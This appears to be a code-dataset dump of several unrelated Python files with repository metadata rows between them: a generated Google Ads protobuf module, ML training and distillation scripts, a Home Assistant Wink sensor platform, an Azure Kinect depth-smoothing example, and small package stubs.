DESCRIPTOR.message_types_by_name['CustomInterestOperation'] = _CUSTOMINTERESTOPERATION
DESCRIPTOR.message_types_by_name['MutateCustomInterestsResponse'] = _MUTATECUSTOMINTERESTSRESPONSE
DESCRIPTOR.message_types_by_name['MutateCustomInterestResult'] = _MUTATECUSTOMINTERESTRESULT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetCustomInterestRequest = _reflection.GeneratedProtocolMessageType('GetCustomInterestRequest', (_message.Message,), {
'DESCRIPTOR' : _GETCUSTOMINTERESTREQUEST,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """Request message for [CustomInterestService.GetCustomInterest][google.a
ds.googleads.v6.services.CustomInterestService.GetCustomInterest].
Attributes:
resource_name:
Required. The resource name of the custom interest to fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.GetCustomInterestRequest)
})
_sym_db.RegisterMessage(GetCustomInterestRequest)
MutateCustomInterestsRequest = _reflection.GeneratedProtocolMessageType('MutateCustomInterestsRequest', (_message.Message,), {
'DESCRIPTOR' : _MUTATECUSTOMINTERESTSREQUEST,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """Request message for [CustomInterestService.MutateCustomInterests][goog
le.ads.googleads.v6.services.CustomInterestService.MutateCustomInteres
ts].
Attributes:
customer_id:
Required. The ID of the customer whose custom interests are
being modified.
operations:
Required. The list of operations to perform on individual
custom interests.
validate_only:
If true, the request is validated but not executed. Only
errors are returned, not results.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.MutateCustomInterestsRequest)
})
_sym_db.RegisterMessage(MutateCustomInterestsRequest)
CustomInterestOperation = _reflection.GeneratedProtocolMessageType('CustomInterestOperation', (_message.Message,), {
'DESCRIPTOR' : _CUSTOMINTERESTOPERATION,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """A single operation (create, update) on a custom interest.
Attributes:
update_mask:
FieldMask that determines which resource fields are modified
in an update.
operation:
The mutate operation.
create:
Create operation: No resource name is expected for the new
custom interest.
update:
Update operation: The custom interest is expected to have a
valid resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.CustomInterestOperation)
})
_sym_db.RegisterMessage(CustomInterestOperation)
MutateCustomInterestsResponse = _reflection.GeneratedProtocolMessageType('MutateCustomInterestsResponse', (_message.Message,), {
'DESCRIPTOR' : _MUTATECUSTOMINTERESTSRESPONSE,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """Response message for custom interest mutate.
Attributes:
results:
All results for the mutate.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.MutateCustomInterestsResponse)
})
_sym_db.RegisterMessage(MutateCustomInterestsResponse)
MutateCustomInterestResult = _reflection.GeneratedProtocolMessageType('MutateCustomInterestResult', (_message.Message,), {
'DESCRIPTOR' : _MUTATECUSTOMINTERESTRESULT,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """The result for the custom interest mutate.
Attributes:
resource_name:
Returned for successful operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.MutateCustomInterestResult)
})
_sym_db.RegisterMessage(MutateCustomInterestResult)
DESCRIPTOR._options = None
_GETCUSTOMINTERESTREQUEST.fields_by_name['resource_name']._options = None
_MUTATECUSTOMINTERESTSREQUEST.fields_by_name['customer_id']._options = None
_MUTATECUSTOMINTERESTSREQUEST.fields_by_name['operations']._options = None
_CUSTOMINTERESTSERVICE = _descriptor.ServiceDescriptor(
name='CustomInterestService',
full_name='google.ads.googleads.v6.services.CustomInterestService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com',
create_key=_descriptor._internal_create_key,
serialized_start=978,
serialized_end=1483,
methods=[
_descriptor.MethodDescriptor(
name='GetCustomInterest',
full_name='google.ads.googleads.v6.services.CustomInterestService.GetCustomInterest',
index=0,
containing_service=None,
input_type=_GETCUSTOMINTERESTREQUEST,
output_type=google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2._CUSTOMINTEREST,
serialized_options=b'\202\323\344\223\0023\0221/v6/{resource_name=customers/*/customInterests/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='MutateCustomInterests',
full_name='google.ads.googleads.v6.services.CustomInterestService.MutateCustomInterests',
index=1,
containing_service=None,
input_type=_MUTATECUSTOMINTERESTSREQUEST,
output_type=_MUTATECUSTOMINTERESTSRESPONSE,
serialized_options=b'\202\323\344\223\0029\"4/v6/customers/{customer_id=*}/customInterests:mutate:\001*\332A\026customer_id,operations',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CUSTOMINTERESTSERVICE)
DESCRIPTOR.services_by_name['CustomInterestService'] = _CUSTOMINTERESTSERVICE
# @@protoc_insertion_point(module_scope)
| 48.75
| 2,293
| 0.794872
|
56574cfa3400ea078d6b64fdc5af1b3cf3ca4628
| 6,860
|
py
|
Python
|
classifier/train.py
|
theovincent/birdClassification
|
21e23a4f4c67714006e7ccc606134ca8d0fe5d9d
|
[
"MIT"
] | null | null | null |
classifier/train.py
|
theovincent/birdClassification
|
21e23a4f4c67714006e7ccc606134ca8d0fe5d9d
|
[
"MIT"
] | null | null | null |
classifier/train.py
|
theovincent/birdClassification
|
21e23a4f4c67714006e7ccc606134ca8d0fe5d9d
|
[
"MIT"
] | null | null | null |
import sys
import os
import torch
import pandas as pd
def train_cli(argvs=sys.argv[1:]):
import argparse
import torch.optim as optim
from classifier.loader import loader
from classifier.model import get_model
from classifier.loss import cross_entropy_loss
from classifier.validation import validation
parser = argparse.ArgumentParser("Pipeline to train a model to classify the birds")
parser.add_argument(
"-c",
"--colab",
default=False,
action="store_true",
help="if given, path_data will be modified with the correct path to the data in my google drive, otherwise nothing happens, (default: False)",
)
parser.add_argument(
"-m",
"--model",
type=str,
required=True,
metavar="M",
help="the model name (required)",
choices=["resnet", "alexnet", "vgg", "squeezenet", "densenet", "efficientnet"],
)
parser.add_argument(
"-psw",
"--path_starting_weights",
type=str,
default="ImageNet",
metavar="PSW",
help="the path to the starting weights, if None, takes random weights, 'output' will be added to the front (default: ImageNet)",
)
parser.add_argument(
"-pd",
"--path_data",
type=str,
required=True,
metavar="PD",
help="the path that leads to the data, 'bird_dataset' will be added to the front (required)",
)
parser.add_argument(
"-nc",
"--number_classes",
type=int,
default=20,
metavar="NC",
help="the number of classes to classify (default: 20)",
)
parser.add_argument(
"-4D",
"--classifier_4D",
default=False,
action="store_true",
help="if given, a segmentation map will be added to the input, (default: False)",
)
parser.add_argument(
"-fe",
"--feature_extraction",
default=False,
action="store_true",
help="if given, feature extraction will be performed, otherwise full training will be done, (default: False)",
)
parser.add_argument(
"-bs", "--batch_size", type=int, default=64, metavar="BS", help="input batch size for training (default: 64)"
)
parser.add_argument(
"-ne", "--n_epochs", type=int, default=1, metavar="NE", help="number of epochs to train (default: 10)"
)
parser.add_argument(
"-lr",
"--learning_rate",
type=float,
default=0.0005,
metavar="LR",
help="first learning rate before decreasing (default: 0.0005)",
)
parser.add_argument("-s", "--seed", type=int, default=1, metavar="S", help="random seed (default: 1)")
parser.add_argument(
"-po",
"--path_output",
type=str,
required=True,
metavar="PO",
help="folder where experiment outputs are located, 'output' will be added to the front (required)",
)
args = parser.parse_args(argvs)
print(args)
path_output = f"output/{args.path_output}"
# Create experiment folder
if not os.path.isdir(path_output):
os.makedirs(path_output)
# Torch meta settings
use_cuda = torch.cuda.is_available()
if use_cuda:
map_location = torch.device("cuda")
else:
map_location = torch.device("cpu")
torch.manual_seed(args.seed)
# Define the model, the loss and the optimizer
if args.path_starting_weights is not None and args.path_starting_weights != "ImageNet":
if args.colab:
args.path_starting_weights = (
f"/content/Drive/MyDrive/MVA/ObjectRecognition/birdClassification/output/{args.path_starting_weights}"
)
else:
args.path_starting_weights = f"output/{args.path_starting_weights}"
model, input_size = get_model(
args.model,
feature_extract=args.feature_extraction,
path_starting_weights=args.path_starting_weights,
num_classes=args.number_classes,
classifier_4D=args.classifier_4D,
map_location=map_location,
)
if use_cuda:
print("\n\n!! Using GPU !!\n\n")
model.cuda()
else:
print("\n\n!! Using CPU !!\n\n")
loss = cross_entropy_loss()
losses = pd.DataFrame(
None, index=range(1, args.n_epochs + 1), columns=["train_loss", "validation_loss", "validation_accuracy"]
)
# Define the data loaders
if args.colab:
args.path_data = (
"/content/Drive/MyDrive/MVA/ObjectRecognition/birdClassification/bird_dataset/" + args.path_data
)
else:
args.path_data = "bird_dataset/" + args.path_data
train_loader = loader(
args.path_data,
input_size,
"train",
args.batch_size,
shuffle=True,
data_augmentation=True,
classifier_4D=args.classifier_4D,
)
validation_loader = loader(
args.path_data,
input_size,
"val",
args.batch_size,
shuffle=False,
data_augmentation=False,
classifier_4D=args.classifier_4D,
)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate, weight_decay=0.05)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, "min", factor=0.5, patience=6, verbose=True)
for epoch in range(1, args.n_epochs + 1):
print(f"Train Epoch {epoch}:")
train_loss = train_on_epoch(model, loss, optimizer, train_loader, use_cuda) / args.batch_size
validation_loss, validation_accuracy = validation(model, loss, validation_loader, use_cuda)
scheduler.step(validation_loss)
losses.loc[epoch, ["train_loss", "validation_loss", "validation_accuracy"]] = [
train_loss,
validation_loss,
validation_accuracy,
]
if epoch % 2 == 1:
path_weights = f"{path_output}/{args.model}_{str(epoch)}.pth"
torch.save(model.state_dict(), path_weights)
# Save at each epoch to be sure that the metrics are saved if an error occures
losses.reset_index().to_feather(f"{path_output}/{args.model}.feather")
def train_on_epoch(model, loss, optimizer, loader, use_cuda):
loss_on_batch = None
model.train()
for batch_idx, (data, target) in enumerate(loader):
if use_cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
output = model(data)
loss_error = loss(output, target)
loss_error.backward()
optimizer.step()
if batch_idx % (len(loader) // 5) == 0:
loss_on_batch = loss_error.data.item()
print(
f"[{batch_idx * len(data)}/{len(loader.dataset)} ({int(100.0 * batch_idx / len(loader))}%)]\tLoss: {loss_on_batch:.6f}"
)
return loss_on_batch
| 32.206573
| 150
| 0.615889
|
e82a767fde831567fc037288d23e024e35688e43
| 6,534
|
py
|
Python
|
homeassistant/components/wink/binary_sensor.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-21T18:09:09.000Z
|
2022-01-17T08:06:03.000Z
|
homeassistant/components/wink/binary_sensor.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 39
|
2016-12-16T12:40:34.000Z
|
2017-02-13T17:53:42.000Z
|
homeassistant/components/wink/binary_sensor.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-11T15:44:13.000Z
|
2022-01-17T08:06:09.000Z
|
"""Support for Wink binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import DOMAIN, WinkDevice
_LOGGER = logging.getLogger(__name__)
# These are the available sensors mapped to binary_sensor class
SENSOR_TYPES = {
"brightness": "light",
"capturing_audio": "sound",
"capturing_video": None,
"co_detected": "gas",
"liquid_detected": "moisture",
"loudness": "sound",
"motion": "motion",
"noise": "sound",
"opened": "opening",
"presence": "occupancy",
"smoke_detected": "smoke",
"vibration": "vibration",
}
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Wink binary sensor platform."""
import pywink
for sensor in pywink.get_sensors():
_id = sensor.object_id() + sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
if sensor.capability() in SENSOR_TYPES:
add_entities([WinkBinarySensorDevice(sensor, hass)])
for key in pywink.get_keys():
_id = key.object_id() + key.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkBinarySensorDevice(key, hass)])
for sensor in pywink.get_smoke_and_co_detectors():
_id = sensor.object_id() + sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkSmokeDetector(sensor, hass)])
for hub in pywink.get_hubs():
_id = hub.object_id() + hub.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkHub(hub, hass)])
for remote in pywink.get_remotes():
_id = remote.object_id() + remote.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkRemote(remote, hass)])
for button in pywink.get_buttons():
_id = button.object_id() + button.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkButton(button, hass)])
for gang in pywink.get_gangs():
_id = gang.object_id() + gang.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkGang(gang, hass)])
for door_bell_sensor in pywink.get_door_bells():
_id = door_bell_sensor.object_id() + door_bell_sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkBinarySensorDevice(door_bell_sensor, hass)])
for camera_sensor in pywink.get_cameras():
_id = camera_sensor.object_id() + camera_sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
try:
if camera_sensor.capability() in SENSOR_TYPES:
add_entities([WinkBinarySensorDevice(camera_sensor, hass)])
except AttributeError:
_LOGGER.info("Device isn't a sensor, skipping")
class WinkBinarySensorDevice(WinkDevice, BinarySensorDevice):
"""Representation of a Wink binary sensor."""
def __init__(self, wink, hass):
"""Initialize the Wink binary sensor."""
super().__init__(wink, hass)
if hasattr(self.wink, "unit"):
self._unit_of_measurement = self.wink.unit()
else:
self._unit_of_measurement = None
if hasattr(self.wink, "capability"):
self.capability = self.wink.capability()
else:
self.capability = None
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self.hass.data[DOMAIN]["entities"]["binary_sensor"].append(self)
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self.wink.state()
@property
def device_class(self):
"""Return the class of this sensor, from DEVICE_CLASSES."""
return SENSOR_TYPES.get(self.capability)
@property
def device_state_attributes(self):
"""Return the device state attributes."""
return super().device_state_attributes
class WinkSmokeDetector(WinkBinarySensorDevice):
"""Representation of a Wink Smoke detector."""
@property
def device_state_attributes(self):
"""Return the device state attributes."""
_attributes = super().device_state_attributes
_attributes["test_activated"] = self.wink.test_activated()
return _attributes
class WinkHub(WinkBinarySensorDevice):
"""Representation of a Wink Hub."""
@property
def device_state_attributes(self):
"""Return the device state attributes."""
_attributes = super().device_state_attributes
_attributes["update_needed"] = self.wink.update_needed()
_attributes["firmware_version"] = self.wink.firmware_version()
_attributes["pairing_mode"] = self.wink.pairing_mode()
_kidde_code = self.wink.kidde_radio_code()
if _kidde_code is not None:
# The service call to set the Kidde code
# takes a string of 1s and 0s so it makes
# sense to display it to the user that way
_formatted_kidde_code = f"{_kidde_code:b}".zfill(8)
_attributes["kidde_radio_code"] = _formatted_kidde_code
return _attributes
class WinkRemote(WinkBinarySensorDevice):
"""Representation of a Wink Lutron Connected bulb remote."""
@property
def device_state_attributes(self):
"""Return the state attributes."""
_attributes = super().device_state_attributes
_attributes["button_on_pressed"] = self.wink.button_on_pressed()
_attributes["button_off_pressed"] = self.wink.button_off_pressed()
_attributes["button_up_pressed"] = self.wink.button_up_pressed()
_attributes["button_down_pressed"] = self.wink.button_down_pressed()
return _attributes
@property
def device_class(self):
"""Return the class of this sensor, from DEVICE_CLASSES."""
return None
class WinkButton(WinkBinarySensorDevice):
"""Representation of a Wink Relay button."""
@property
def device_state_attributes(self):
"""Return the device state attributes."""
_attributes = super().device_state_attributes
_attributes["pressed"] = self.wink.pressed()
_attributes["long_pressed"] = self.wink.long_pressed()
return _attributes
class WinkGang(WinkBinarySensorDevice):
"""Representation of a Wink Relay gang."""
@property
def is_on(self):
"""Return true if the gang is connected."""
return self.wink.state()
| 35.129032
| 79
| 0.653658
|
59c148115aeb2f4ad2629408d740af2936d0ac3b
| 777
|
py
|
Python
|
setup.py
|
AlexSartori/mcvf
|
23f879b22db2bd46b9d527ca4d926ccd3bc65d8d
|
[
"MIT"
] | null | null | null |
setup.py
|
AlexSartori/mcvf
|
23f879b22db2bd46b9d527ca4d926ccd3bc65d8d
|
[
"MIT"
] | null | null | null |
setup.py
|
AlexSartori/mcvf
|
23f879b22db2bd46b9d527ca4d926ccd3bc65d8d
|
[
"MIT"
] | null | null | null |
import setuptools # type: ignore
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="mcvf",
version="0.0.1",
author="Alessandro Sartori",
author_email="alex.sartori1997@gmail.com",
description="Motion-Compensated Video Filtering",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/alexsartori/mcvf",
packages=setuptools.find_packages(),
package_data={},
entry_points={
},
classifiers=[
"Programming Language :: Python :: 3 :: Only",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
keywords='motion-compensated video filtering',
python_requires='>=3.6',
)
| 27.75
| 54
| 0.662806
|
9eb3397dcc5364048474e1320d58fff98f90a528
| 194
|
py
|
Python
|
pincer/middleware/activity_join_request.py
|
ashu96902/Pincer
|
102ac4ff998cbb3c57a86b252439f69895650cf3
|
[
"MIT"
] | null | null | null |
pincer/middleware/activity_join_request.py
|
ashu96902/Pincer
|
102ac4ff998cbb3c57a86b252439f69895650cf3
|
[
"MIT"
] | null | null | null |
pincer/middleware/activity_join_request.py
|
ashu96902/Pincer
|
102ac4ff998cbb3c57a86b252439f69895650cf3
|
[
"MIT"
] | null | null | null |
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
"""sent when the user receives a Rich Presence Ask to Join request"""
# TODO: Implement event
| 27.714286
| 69
| 0.747423
|
32493a8056882d3111a51a49ebdbc044fed751b7
| 2,543
|
py
|
Python
|
examples/exampleSmoothDepthImageOpenCV.py
|
bearpaw/pyKinectAzure
|
e55bc574806641b9e3209d7843ccadd871a630a5
|
[
"MIT"
] | null | null | null |
examples/exampleSmoothDepthImageOpenCV.py
|
bearpaw/pyKinectAzure
|
e55bc574806641b9e3209d7843ccadd871a630a5
|
[
"MIT"
] | null | null | null |
examples/exampleSmoothDepthImageOpenCV.py
|
bearpaw/pyKinectAzure
|
e55bc574806641b9e3209d7843ccadd871a630a5
|
[
"MIT"
] | null | null | null |
import sys
sys.path.insert(1, '../pyKinectAzure/')
import numpy as np
from pyKinectAzure import pyKinectAzure, _k4a, postProcessing
import cv2
# Path to the module
# TODO: Modify with the path containing the k4a.dll from the Azure Kinect SDK
modulePath = 'C:\\Program Files\\Azure Kinect SDK v1.4.1\\sdk\\windows-desktop\\amd64\\release\\bin\\k4a.dll'
if __name__ == "__main__":
# Initialize the library with the path containing the module
pyK4A = pyKinectAzure(modulePath)
# Open device
pyK4A.device_open()
# Modify camera configuration
device_config = pyK4A.config
device_config.color_resolution = _k4a.K4A_COLOR_RESOLUTION_1080P
device_config.depth_mode = _k4a.K4A_DEPTH_MODE_WFOV_2X2BINNED
print(device_config)
# Start cameras using modified configuration
pyK4A.device_start_cameras(device_config)
k = 0
while True:
# Get capture
pyK4A.device_get_capture()
# Get the depth image from the capture
depth_image_handle = pyK4A.capture_get_depth_image()
# Check the image has been read correctly
if depth_image_handle:
# Read and convert the image data to numpy array:
depth_image = pyK4A.image_convert_to_numpy(depth_image_handle)
# Smooth the image using Navier-Stokes based inpainintg. maximum_hole_size defines
# the maximum hole size to be filled, bigger hole size will take longer time to process
maximum_hole_size = 10
smoothed_depth_image = postProcessing.smooth_depth_image(depth_image,maximum_hole_size)
# Convert depth image (mm) to color, the range needs to be reduced down to the range (0,255)
depth_color_image = cv2.applyColorMap(np.round(depth_image/30).astype(np.uint8), cv2.COLORMAP_JET)
smooth_depth_color_image = cv2.applyColorMap(np.round(smoothed_depth_image/30).astype(np.uint8), cv2.COLORMAP_JET)
# Concatenate images for comparison
comparison_image = np.concatenate((depth_color_image, smooth_depth_color_image), axis=1)
comparison_image = cv2.putText(comparison_image, 'Original', (180, 50) , cv2.FONT_HERSHEY_SIMPLEX ,1.5, (255,255,255), 3, cv2.LINE_AA)
comparison_image = cv2.putText(comparison_image, 'Smoothed', (670, 50) , cv2.FONT_HERSHEY_SIMPLEX ,1.5, (255,255,255), 3, cv2.LINE_AA)
# Plot the image
cv2.namedWindow('Smoothed Depth Image',cv2.WINDOW_NORMAL)
cv2.imshow('Smoothed Depth Image',comparison_image)
k = cv2.waitKey(25)
# Release the image
pyK4A.image_release(depth_image_handle)
pyK4A.capture_release()
if k==27: # Esc key to stop
break
pyK4A.device_stop_cameras()
pyK4A.device_close()
| 35.816901
| 138
| 0.768777
|
338f4d7afbe4e6ad4b4c4d91eebd561a5b6d4b7d
| 904
|
py
|
Python
|
ml/ex02/grid_search.py
|
AlexanderChristian/private_courses
|
c80f3526af539e35f93b460f3909f669aaef573c
|
[
"MIT"
] | null | null | null |
ml/ex02/grid_search.py
|
AlexanderChristian/private_courses
|
c80f3526af539e35f93b460f3909f669aaef573c
|
[
"MIT"
] | 6
|
2020-03-04T20:52:39.000Z
|
2022-03-31T00:33:07.000Z
|
ml/ex02/solution/grid_search.py
|
AlexanderChristian/private_courses
|
c80f3526af539e35f93b460f3909f669aaef573c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Exercise 2.
Grid Search
"""
import numpy as np
from costs import compute_loss
def generate_w(num_intervals):
"""Generate a grid of values for w0 and w1."""
w0 = np.linspace(-100, 200, num_intervals)
w1 = np.linspace(-150, 150, num_intervals)
return w0, w1
def grid_search(y, tx, w0, w1):
"""Algorithm for grid search."""
losses = np.zeros((len(w0), len(w1)))
# compute loss for each combination of w0 and w1.
for ind_row, row in enumerate(w0):
for ind_col, col in enumerate(w1):
w = np.array([row, col])
losses[ind_row, ind_col] = compute_loss(y, tx, w)
return losses
def get_best_parameters(w0, w1, losses):
"""Get the best w from the result of grid search."""
min_row, min_col = np.unravel_index(np.argmin(losses), losses.shape)
return losses[min_row, min_col], w0[min_row], w1[min_col]
| 27.393939
| 72
| 0.646018
|
365ff6a84a678ba4e79c8b8ccec547516c10b7fa
| 2,825
|
py
|
Python
|
research/information_retrieval/doc2query/src/distill_doc2query.py
|
clementpoiret/sparseml
|
8442a6ef8ba11fb02f5e51472dd68b72438539b9
|
[
"Apache-2.0"
] | 922
|
2021-02-04T17:51:54.000Z
|
2022-03-31T20:49:26.000Z
|
research/information_retrieval/doc2query/src/distill_doc2query.py
|
clementpoiret/sparseml
|
8442a6ef8ba11fb02f5e51472dd68b72438539b9
|
[
"Apache-2.0"
] | 197
|
2021-02-04T22:17:21.000Z
|
2022-03-31T13:58:55.000Z
|
research/information_retrieval/doc2query/src/distill_doc2query.py
|
clementpoiret/sparseml
|
8442a6ef8ba11fb02f5e51472dd68b72438539b9
|
[
"Apache-2.0"
] | 80
|
2021-02-04T22:20:14.000Z
|
2022-03-30T19:36:15.000Z
|
# neuralmagic: no copyright
# flake8: noqa
# fmt: off
# isort: skip_file
#!/usr/bin/env python
# coding=utf-8
# Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
import torch
from torch import nn
import torch.nn.functional as F
from torch import Tensor
from transformers import Trainer, is_datasets_available, is_torch_tpu_available
from transformers.trainer_utils import PredictionOutput
class DistillGlueTrainer(Trainer):
def __init__(self, *args, eval_examples=None, post_process_function=None, teacher=None, loss=None, batch_size=8, max_sequence_length=384,distill_hardness=1.0, temperature=2.0, **kwargs):
super().__init__(*args, **kwargs)
self.eval_examples = eval_examples
self.post_process_function = post_process_function
self.loss = loss
self.teacher = teacher
self.batch_size = batch_size
self.temperature = temperature
self.distill_hardness = distill_hardness
self.criterion = nn.CrossEntropyLoss()
self.max_sequence_length = max_sequence_length
if self.teacher is None:
self.distill_hardness = 0
def compute_loss(self, model, inputs, return_outputs=False):
"""
How the loss is computed by Trainer. Modified for Distilation using student teacher framework modified for distilation.
"""
outputs = model(**inputs)
loss = outputs["loss"]
logits_student = outputs["logits"]
if self.teacher is not None:
input_device = inputs["input_ids"].device
self.teacher = self.teacher.to(input_device)
with torch.no_grad():
teacher_outputs = self.teacher(
input_ids=inputs["input_ids"],
token_type_ids=inputs["token_type_ids"],
attention_mask=inputs["attention_mask"],
)
logits_teacher = teacher_outputs["logits"]
loss_distill = F.kl_div( input=logits_student, target=logits_teacher, reduction="batchmean",) * (self.temperature ** 2)
loss = ((1-self.distill_hardness) * loss) + torch.abs((self.distill_hardness * loss_distill))
return (loss, outputs) if return_outputs else loss
| 43.461538
| 190
| 0.688142
|
069904d04b11d883234d90febb09382c7c4ec8ec
| 4,067
|
py
|
Python
|
examples/kddcup2021/MAG240M/r_unimp/dataset/sage_institution_x.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 1,389
|
2019-06-11T03:29:20.000Z
|
2022-03-29T18:25:43.000Z
|
examples/kddcup2021/MAG240M/r_unimp/dataset/sage_institution_x.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 232
|
2019-06-21T06:52:10.000Z
|
2022-03-29T08:20:31.000Z
|
examples/kddcup2021/MAG240M/r_unimp/dataset/sage_institution_x.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 229
|
2019-06-20T12:13:58.000Z
|
2022-03-25T12:04:48.000Z
|
import os
import yaml
import pgl
import time
import copy
import numpy as np
import os.path as osp
from pgl.utils.logger import log
from pgl.bigraph import BiGraph
from pgl import graph_kernel
from pgl.sampling.custom import subgraph
from ogb.lsc import MAG240MDataset, MAG240MEvaluator
import time
import paddle
from tqdm import tqdm
from pgl.utils.helper import scatter
def get_col_slice(x, start_row_idx, end_row_idx, start_col_idx, end_col_idx):
outs = []
chunk = 100000
for i in tqdm(range(start_row_idx, end_row_idx, chunk)):
j = min(i + chunk, end_row_idx)
outs.append(x[i:j, start_col_idx:end_col_idx].copy())
return np.concatenate(outs, axis=0)
def save_col_slice(x_src, x_dst, start_row_idx, end_row_idx, start_col_idx,
end_col_idx):
assert x_src.shape[0] == end_row_idx - start_row_idx
assert x_src.shape[1] == end_col_idx - start_col_idx
chunk, offset = 100000, start_row_idx
for i in tqdm(range(0, end_row_idx - start_row_idx, chunk)):
j = min(i + chunk, end_row_idx - start_row_idx)
x_dst[offset + i:offset + j, start_col_idx:end_col_idx] = x_src[i:j]
class MAG240M(object):
"""Iterator"""
def __init__(self, data_dir, seed=123):
self.data_dir = data_dir
self.num_features = 768
self.num_classes = 153
self.seed = seed
def prepare_data(self):
dataset = MAG240MDataset(self.data_dir)
log.info(dataset.num_authors)
log.info(dataset.num_institutions)
author_path = f'{dataset.dir}/author_feat.npy'
path = f'{dataset.dir}/institution_feat.npy'
t = time.perf_counter()
if not osp.exists(path):
log.info('get institution_feat...')
author_feat = np.memmap(author_path, dtype=np.float16,
shape=(dataset.num_authors, self.num_features),
mode='r')
# author
edge_index = dataset.edge_index('author', 'institution')
edge_index = edge_index.T
log.info(edge_index.shape)
institution_graph = BiGraph(edge_index, dst_num_nodes=dataset.num_institutions)
institution_graph.tensor()
log.info('finish institution graph')
institution_x = np.memmap(path, dtype=np.float16, mode='w+',
shape=(dataset.num_institutions, self.num_features))
dim_chunk_size = 64
degree = paddle.zeros(shape=[dataset.num_institutions, 1], dtype='float32')
temp_one = paddle.ones(shape=[edge_index.shape[0], 1], dtype='float32')
degree = scatter(degree, overwrite=False, index=institution_graph.edges[:, 1],
updates=temp_one)
log.info('finish degree')
for i in tqdm(range(0, self.num_features, dim_chunk_size)):
j = min(i + dim_chunk_size, self.num_features)
inputs = get_col_slice(author_feat, start_row_idx=0,
end_row_idx=dataset.num_authors,
start_col_idx=i, end_col_idx=j)
inputs = paddle.to_tensor(inputs, dtype='float32')
outputs = institution_graph.send_recv(inputs)
outputs = outputs / degree
outputs = outputs.astype('float16').numpy()
del inputs
save_col_slice(
x_src=outputs, x_dst=institution_x, start_row_idx=0,
end_row_idx=dataset.num_institutions,
start_col_idx=i, end_col_idx=j)
del outputs
institution_x.flush()
del institution_x
log.info(f'Done! [{time.perf_counter() - t:.2f}s]')
if __name__ == "__main__":
root = 'dataset_path'
print(root)
dataset = MAG240M(root)
dataset.prepare_data()
| 38.009346
| 91
| 0.592083
|
4e1c1c3c7163caea0c2e8ec95f8c40b3442eaa0e
| 602
|
py
|
Python
|
i3py/core/actions/__init__.py
|
Ecpy/i3py
|
6f004d3e2ee2b788fb4693606cc4092147655ce1
|
[
"BSD-3-Clause"
] | 1
|
2018-03-20T09:24:54.000Z
|
2018-03-20T09:24:54.000Z
|
i3py/core/actions/__init__.py
|
Ecpy/i3py
|
6f004d3e2ee2b788fb4693606cc4092147655ce1
|
[
"BSD-3-Clause"
] | 7
|
2017-10-11T17:15:17.000Z
|
2018-01-22T14:31:50.000Z
|
i3py/core/actions/__init__.py
|
Exopy/i3py
|
6f004d3e2ee2b788fb4693606cc4092147655ce1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2016-2017 by I3py Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
